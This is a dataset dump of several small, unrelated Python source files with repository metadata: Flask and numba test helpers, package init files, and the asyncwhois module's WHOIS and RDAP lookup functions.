795eef20281b050104b8307eb723e72711efa115 | 153 | py | Python | example/blueprints/testblueprint.py | MaayanLab/jupyter-template | dd05bfcb95c9eafb1a9df845b5d8fecae1d6b9d5 | [
"Apache-2.0"
] | null | null | null | example/blueprints/testblueprint.py | MaayanLab/jupyter-template | dd05bfcb95c9eafb1a9df845b5d8fecae1d6b9d5 | [
"Apache-2.0"
] | 24 | 2020-04-07T17:04:47.000Z | 2020-05-27T00:51:25.000Z | example/blueprints/testblueprint.py | MaayanLab/jupyter-template | dd05bfcb95c9eafb1a9df845b5d8fecae1d6b9d5 | [
"Apache-2.0"
] | null | null | null | from flask import Blueprint
testblueprint = Blueprint('testblueprint', __name__)
@testblueprint.route('/')
def testroute():
return 'Test Blueprint!'
| 19.125 | 52 | 0.75817 | 15 | 153 | 7.466667 | 0.733333 | 0.392857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 153 | 7 | 53 | 21.857143 | 0.82963 | 0 | 0 | 0 | 0 | 0 | 0.189542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0.8 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 6 |
7983f56eea93961f9c0a70fd423f832389ff4cae | 1,548 | py | Python | dev/Gems/CloudGemMetric/v1/AWS/common-code/Lib/numba/tests/complex_usecases.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 1,738 | 2017-09-21T10:59:12.000Z | 2022-03-31T21:05:46.000Z | dev/Gems/CloudGemMetric/v1/AWS/common-code/Lib/numba/tests/complex_usecases.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 427 | 2017-09-29T22:54:36.000Z | 2022-02-15T19:26:50.000Z | dev/Gems/CloudGemMetric/v1/AWS/common-code/Lib/numba/tests/complex_usecases.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 671 | 2017-09-21T08:04:01.000Z | 2022-03-29T14:30:07.000Z | from __future__ import division
import cmath
def div_usecase(x, y):
return x / y
def real_usecase(x):
return x.real
def imag_usecase(x):
return x.imag
def conjugate_usecase(x):
return x.conjugate()
def acos_usecase(x):
return cmath.acos(x)
def cos_usecase(x):
return cmath.cos(x)
def asin_usecase(x):
return cmath.asin(x)
def sin_usecase(x):
return cmath.sin(x)
def atan_usecase(x):
return cmath.atan(x)
def tan_usecase(x):
return cmath.tan(x)
def acosh_usecase(x):
return cmath.acosh(x)
def cosh_usecase(x):
return cmath.cosh(x)
def asinh_usecase(x):
return cmath.asinh(x)
def sinh_usecase(x):
return cmath.sinh(x)
def atanh_usecase(x):
return cmath.atanh(x)
def tanh_usecase(x):
return cmath.tanh(x)
def exp_usecase(x):
return cmath.exp(x)
def isfinite_usecase(x):
return cmath.isfinite(x)
def isinf_usecase(x):
return cmath.isinf(x)
def isnan_usecase(x):
return cmath.isnan(x)
def log_usecase(x):
return cmath.log(x)
def log_base_usecase(x, base):
return cmath.log(x, base)
def log10_usecase(x):
return cmath.log10(x)
def phase_usecase(x):
return cmath.phase(x)
def polar_usecase(x):
return cmath.polar(x)
_two = 2.0
def polar_as_complex_usecase(x):
# HACK: clear errno by invoking float.__pow__
# (workaround for http://bugs.python.org/issue24489)
_two ** _two
return complex(*cmath.polar(x))
def rect_usecase(r, phi):
return cmath.rect(r, phi)
def sqrt_usecase(x):
return cmath.sqrt(x)
| 16.125 | 56 | 0.686693 | 254 | 1,548 | 4.019685 | 0.228346 | 0.211557 | 0.329089 | 0.390793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008807 | 0.193152 | 1,548 | 95 | 57 | 16.294737 | 0.808647 | 0.060724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0 | 0.033333 | 0.45 | 0.966667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
798a25e1048ad9409d29b44bdfd6e8a7a4ae1be0 | 36 | py | Python | test/test_series/__init__.py | clebsonpy/HydroComp | 9d17fa533e8a15c760030df5246ff531ddb4cb22 | [
"MIT"
] | 4 | 2020-05-14T20:03:49.000Z | 2020-05-22T19:56:43.000Z | test/test_series/__init__.py | clebsonpy/HydroComp | 9d17fa533e8a15c760030df5246ff531ddb4cb22 | [
"MIT"
] | 19 | 2019-06-27T18:12:27.000Z | 2020-04-28T13:28:03.000Z | test/test_series/__init__.py | clebsonpy/HydroComp | 9d17fa533e8a15c760030df5246ff531ddb4cb22 | [
"MIT"
] | null | null | null | from re import I
from .flow import * | 18 | 19 | 0.75 | 7 | 36 | 3.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194444 | 36 | 2 | 19 | 18 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
79b88b6871ed2dfa7793027f730e6f6e3d5e5fbd | 252 | py | Python | localhost/_core/controller.py | KnJbMfLAgdkwZL/discord_webm_2ch_bot | 18ce95f9d4b92c30079a4dbb2144dddaace00d03 | [
"MIT"
] | null | null | null | localhost/_core/controller.py | KnJbMfLAgdkwZL/discord_webm_2ch_bot | 18ce95f9d4b92c30079a4dbb2144dddaace00d03 | [
"MIT"
] | null | null | null | localhost/_core/controller.py | KnJbMfLAgdkwZL/discord_webm_2ch_bot | 18ce95f9d4b92c30079a4dbb2144dddaace00d03 | [
"MIT"
] | null | null | null | class controller:
def __init__(self):
# print(f'Constructor {self.getName()}')
pass
def __del__(self):
# print(f'Destructor {self.getName()}')
pass
def getName(self):
return self.__class__.__name__
| 21 | 48 | 0.587302 | 27 | 252 | 4.888889 | 0.518519 | 0.136364 | 0.151515 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 252 | 11 | 49 | 22.909091 | 0.733333 | 0.301587 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.285714 | 0 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
8db9aba9a9e7e116173a2557a47f23c1b9565fda | 43 | py | Python | sdk/exception/system_exception.py | CLG0125/elemesdk | 344466398bad7cf026e082e47c77d3ca98621ef3 | [
"MIT"
] | 1 | 2021-04-03T05:11:29.000Z | 2021-04-03T05:11:29.000Z | sdk/exception/system_exception.py | CLG0125/elemesdk | 344466398bad7cf026e082e47c77d3ca98621ef3 | [
"MIT"
] | null | null | null | sdk/exception/system_exception.py | CLG0125/elemesdk | 344466398bad7cf026e082e47c77d3ca98621ef3 | [
"MIT"
] | null | null | null |
class SystemException(Exception):pass
| 14.333333 | 37 | 0.767442 | 4 | 43 | 8.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 3 | 38 | 14.333333 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
30e20a7de1623a9f749b570f10aebdd46b14170b | 101 | py | Python | pyhiveodbc/__init__.py | bi4group/PyHiveODBC | 5cc42912cc90f817eeb2a75efa277d330cc9710d | [
"Apache-2.0"
] | 2 | 2018-05-04T18:13:47.000Z | 2018-12-05T08:46:29.000Z | pyhiveodbc/__init__.py | bi4group/PyHiveODBC | 5cc42912cc90f817eeb2a75efa277d330cc9710d | [
"Apache-2.0"
] | null | null | null | pyhiveodbc/__init__.py | bi4group/PyHiveODBC | 5cc42912cc90f817eeb2a75efa277d330cc9710d | [
"Apache-2.0"
] | 2 | 2020-01-29T05:26:02.000Z | 2020-10-13T14:30:42.000Z | from __future__ import absolute_import
from __future__ import unicode_literals
__version__ = '0.5.1'
| 25.25 | 39 | 0.841584 | 14 | 101 | 5.071429 | 0.714286 | 0.28169 | 0.450704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.108911 | 101 | 3 | 40 | 33.666667 | 0.755556 | 0 | 0 | 0 | 0 | 0 | 0.049505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
30e9bff121a5294a667a70eb6c935a86eecb9cfe | 134 | py | Python | tests/test_index.py | kmbn/zeit-now-filter-feeds | a138b5d5f4b5113ad0f64dea9db1f1fd0d2cf687 | [
"MIT"
] | null | null | null | tests/test_index.py | kmbn/zeit-now-filter-feeds | a138b5d5f4b5113ad0f64dea9db1f1fd0d2cf687 | [
"MIT"
] | null | null | null | tests/test_index.py | kmbn/zeit-now-filter-feeds | a138b5d5f4b5113ad0f64dea9db1f1fd0d2cf687 | [
"MIT"
] | null | null | null | """Tests for index.py."""
def test_filter_feed():
# TODO: Add data directory with sample feeds and complete this test.
pass
| 19.142857 | 72 | 0.686567 | 20 | 134 | 4.5 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208955 | 134 | 6 | 73 | 22.333333 | 0.849057 | 0.649254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
eb6368aa32bedbdee8322667625a0f39a8190a4e | 46 | py | Python | onadata/libs/utils/nose_plugins/__init__.py | gushil/kobocat | 5ce27ed5fbf969b2ce68e8a59dd97ced74686711 | [
"BSD-2-Clause"
] | 38 | 2017-02-28T05:39:40.000Z | 2019-01-16T04:39:04.000Z | onadata/libs/utils/nose_plugins/__init__.py | gushil/kobocat | 5ce27ed5fbf969b2ce68e8a59dd97ced74686711 | [
"BSD-2-Clause"
] | 48 | 2019-03-18T09:26:31.000Z | 2019-05-27T08:12:03.000Z | onadata/libs/utils/nose_plugins/__init__.py | gushil/kobocat | 5ce27ed5fbf969b2ce68e8a59dd97ced74686711 | [
"BSD-2-Clause"
] | 5 | 2017-02-22T12:25:19.000Z | 2019-01-15T11:16:40.000Z | from SilenceSouth import SilenceSouth # noqa
| 23 | 45 | 0.826087 | 5 | 46 | 7.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 1 | 46 | 46 | 0.974359 | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb7ffc2878894c014a972376cffbef7ca2acedde | 35 | py | Python | catkin_ws/simulation/rviz_tools_py-master/src/rviz_tools_py/__init__.py | fontysrobotics/Blackboard_based_distributed_fleet_manager | a6b44738fe67f4948a69f8d45da58d981c6724e0 | [
"BSD-3-Clause"
] | 79 | 2020-04-23T04:39:00.000Z | 2022-03-08T09:50:09.000Z | catkin_ws/simulation/rviz_tools_py-master/src/rviz_tools_py/__init__.py | fontysrobotics/Blackboard_based_distributed_fleet_manager | a6b44738fe67f4948a69f8d45da58d981c6724e0 | [
"BSD-3-Clause"
] | 1 | 2020-04-23T10:18:50.000Z | 2020-04-23T10:18:50.000Z | catkin_ws/simulation/rviz_tools_py-master/src/rviz_tools_py/__init__.py | fontysrobotics/Blackboard_based_distributed_fleet_manager | a6b44738fe67f4948a69f8d45da58d981c6724e0 | [
"BSD-3-Clause"
] | 29 | 2020-04-23T07:49:15.000Z | 2022-03-26T11:48:53.000Z | from rviz_tools import RvizMarkers
| 17.5 | 34 | 0.885714 | 5 | 35 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb9be2534c341f91e66f0f6ca6ff0226c416347b | 114 | py | Python | dpaste/contribute.py | mozafrank/dpaste | 3be4bd13075ace2b4b9530172162b1af35bbd0d2 | [
"MIT"
] | null | null | null | dpaste/contribute.py | mozafrank/dpaste | 3be4bd13075ace2b4b9530172162b1af35bbd0d2 | [
"MIT"
] | null | null | null | dpaste/contribute.py | mozafrank/dpaste | 3be4bd13075ace2b4b9530172162b1af35bbd0d2 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def contrib_file(request):
return render(request,'dpaste/contribute.html')
| 22.8 | 49 | 0.807018 | 15 | 114 | 6.066667 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096491 | 114 | 4 | 50 | 28.5 | 0.883495 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
ebe4cbeb2f61cd4e37a6614ab91c5e19c2358f54 | 32 | py | Python | pontoon/tags/tests/conftest.py | foss4/pontoon | 0503cc78f00e1e9d23c1ca885fe74a627563fc82 | [
"BSD-3-Clause"
] | 1,145 | 2015-05-15T01:08:16.000Z | 2022-03-31T14:23:45.000Z | pontoon/tags/tests/conftest.py | foss4/pontoon | 0503cc78f00e1e9d23c1ca885fe74a627563fc82 | [
"BSD-3-Clause"
] | 1,365 | 2015-05-04T21:54:18.000Z | 2022-03-30T16:53:49.000Z | pontoon/tags/tests/conftest.py | foss4/pontoon | 0503cc78f00e1e9d23c1ca885fe74a627563fc82 | [
"BSD-3-Clause"
] | 667 | 2015-05-04T21:33:45.000Z | 2022-03-30T10:25:33.000Z | from .fixtures import * # noqa
| 16 | 31 | 0.6875 | 4 | 32 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 32 | 1 | 32 | 32 | 0.88 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6905dd059134296c87151d3dce08e5a992d15fc7 | 50 | py | Python | utils/__init__.py | SBU-BMI/deep_survival_analysis | 1953155f329ffdb884133ab187046b312844d320 | [
"BSD-3-Clause"
] | null | null | null | utils/__init__.py | SBU-BMI/deep_survival_analysis | 1953155f329ffdb884133ab187046b312844d320 | [
"BSD-3-Clause"
] | null | null | null | utils/__init__.py | SBU-BMI/deep_survival_analysis | 1953155f329ffdb884133ab187046b312844d320 | [
"BSD-3-Clause"
] | null | null | null | from .utils import *
from .pytorch_utils import *
| 16.666667 | 28 | 0.76 | 7 | 50 | 5.285714 | 0.571429 | 0.594595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 50 | 2 | 29 | 25 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
69187928745023645c6634409ac303f8537488d7 | 3,904 | py | Python | asyncwhois/__init__.py | pogzyb/asyncwhois | 44c74184a3b713ec9bdc7322cb7b78d41ea24756 | [
"MIT"
] | 25 | 2020-06-09T00:39:25.000Z | 2022-02-21T08:54:09.000Z | asyncwhois/__init__.py | pogzyb/asyncwhois | 44c74184a3b713ec9bdc7322cb7b78d41ea24756 | [
"MIT"
] | 17 | 2020-04-27T09:35:00.000Z | 2022-02-15T01:56:16.000Z | asyncwhois/__init__.py | pogzyb/asyncwhois | 44c74184a3b713ec9bdc7322cb7b78d41ea24756 | [
"MIT"
] | 4 | 2020-07-10T23:06:46.000Z | 2022-01-22T10:30:04.000Z | from typing import Any, Optional
from .pywhois import PyWhoIs
__all__ = [
'lookup',
'aio_lookup',
'whois_cmd_shell',
'aio_whois_cmd_shell',
'rdap_domain_lookup',
'aio_rdap_domain_lookup'
]
__version__ = '0.4.1'
def lookup(url: str, timeout: int = 10) -> PyWhoIs:
"""
Module entry point for whois lookups. Opens a socket connection to the
whois server, submits a query, and then parses the query output from the server
into a dictionary. Uses "socket.create_connection()" for the socket.
Raises "QueryError" if connection to a server times out or fails.
Raises "NotFoundError" if domain record is "not found" on the server.
:param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
:param timeout: whois server connection timeout (default 10 seconds)
:return: instance of PyWhoIs with "query_output" and "parser_output" attributes
"""
whois = PyWhoIs._from_url(url, timeout)
return whois
def whois_cmd_shell(url: str, timeout: int = 10) -> PyWhoIs:
"""
Equivalent to running "whois <domain>" from the shell. Uses subprocess.Popen().
:param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
:param timeout: whois server connection timeout (default 10 seconds)
:return: instance of PyWhoIs with "query_output" and "parser_output" attributes
"""
whois = PyWhoIs._from_whois_cmd(url, timeout)
return whois
async def aio_lookup(url: str, timeout: int = 10) -> PyWhoIs:
"""
Asynchronous module entry point for whois lookups. Opens a socket connection to the
whois server, submits a query, and then parses the query output from the server
into a dictionary. Uses "asyncio.open_connection()" for the socket.
Raises "QueryError" if connection to a server times out or fails.
Raises "NotFoundError" if domain record is "not found" on the server.
:param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
:param timeout: whois server connection timeout (default 10 seconds)
:return: instance of PyWhoIs with "query_output" and "parser_output" attributes
"""
whois = await PyWhoIs._aio_from_url(url, timeout)
return whois
def rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:
"""
Runs an RDAP query for the given url.
:param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
:param http_client: Optional HTTP Client such as `httpx.Client` or `requests.Session`
:return: instance of PyWhoIs with "query_output" and "parser_output" attributes
"""
whois = PyWhoIs._rdap_domain_from_url(url, http_client)
return whois
async def aio_rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:
"""
Runs an RDAP query for the given url.
:param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
:param http_client: Optional Async HTTP Client such as `httpx.AsyncClient`
:return: instance of PyWhoIs with "query_output" and "parser_output" attributes
"""
whois = await PyWhoIs._aio_rdap_domain_from_url(url, http_client)
return whois
async def aio_whois_cmd_shell(url: str, timeout: int = 10) -> PyWhoIs:
"""
Equivalent to running "whois <domain>" from the shell. Leverages "asyncio.subprocess".
IMPORTANT: Raises "NotImplementedError" if running on Windows and the event loop is
not set to be type "asyncio.ProactorEventLoop". Must set: loop = asyncio.ProactorEventLoop()
:param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
:param timeout: whois server connection timeout (default 10 seconds)
:return: instance of PyWhoIs with "query_output" and "parser_output" attributes
"""
whois = await PyWhoIs._aio_from_whois_cmd(url, timeout)
return whois
| 39.836735 | 96 | 0.718494 | 548 | 3,904 | 4.989051 | 0.198905 | 0.032187 | 0.02414 | 0.043892 | 0.851134 | 0.831748 | 0.831748 | 0.768105 | 0.768105 | 0.768105 | 0 | 0.005999 | 0.188781 | 3,904 | 97 | 97 | 40.247423 | 0.857278 | 0.304559 | 0 | 0.206897 | 0 | 0 | 0.083627 | 0.019366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.37931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
694f0b480c0c41a25c9df778d7727b1719cb8c95 | 37 | py | Python | fetcher/__init__.py | molkoback/Fab-Lab-Tokens | 07e9e250931cf344610561108fe199eed257d9b8 | [
"MIT"
] | null | null | null | fetcher/__init__.py | molkoback/Fab-Lab-Tokens | 07e9e250931cf344610561108fe199eed257d9b8 | [
"MIT"
] | null | null | null | fetcher/__init__.py | molkoback/Fab-Lab-Tokens | 07e9e250931cf344610561108fe199eed257d9b8 | [
"MIT"
] | 1 | 2018-10-17T07:05:12.000Z | 2018-10-17T07:05:12.000Z | from .fetcher import DocumentFetcher
| 18.5 | 36 | 0.864865 | 4 | 37 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.969697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.